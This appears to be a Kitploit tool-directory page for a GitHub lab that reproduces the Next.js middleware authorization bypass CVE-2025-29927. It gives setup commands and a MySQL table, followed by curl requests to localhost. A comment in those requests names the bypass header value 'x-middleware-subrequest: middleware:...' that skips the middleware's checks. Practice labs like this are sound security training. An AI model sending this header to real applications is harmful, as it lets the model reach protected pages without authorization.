Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Vuln-Next.js-CVE-2025-29927 | Kitploit
Tools/GitHubGitHub/grand-moomin/vuln-next.js-cve-2025-29927
Vulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubgrand-moomin/vuln-next.js-cve-2025-29927

Vuln-Next.js-CVE-2025-29927

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
1 year agoNot yet reviewed
root@kitploit:~
npx [email protected]

Install packages

root@kitploit:~
npm install -D @types/bcrypt
npm install mysql2 
npm install jose
npm install -D @types/jsonwebtoken

Prepare DB

root@kitploit:~
CREATE TABLE users (
  id INT PRIMARY KEY AUTO_INCREMENT,
  username VARCHAR(255) UNIQUE NOT NULL,
  password VARCHAR(255) NOT NULL 
);

Run

root@kitploit:~
npm run dev

root@kitploit:~
# Register some users for test.
curl http://localhost:3000/api/register

# Curl dashboard with or without the header:
# "x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"
curl http://localhost:3000/dashboard


Download Tool